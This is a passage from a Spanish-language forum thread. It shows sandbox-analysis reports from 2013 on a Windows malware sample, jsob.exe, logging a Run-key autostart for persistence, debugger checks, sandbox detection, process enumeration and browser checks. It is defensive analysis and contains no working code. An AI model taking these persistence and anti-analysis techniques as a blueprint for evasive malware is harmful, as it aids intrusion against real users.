lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Código:
 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Código:
Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Sigue...
Páginas: 1 ... 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 [88] 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 ... 122
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines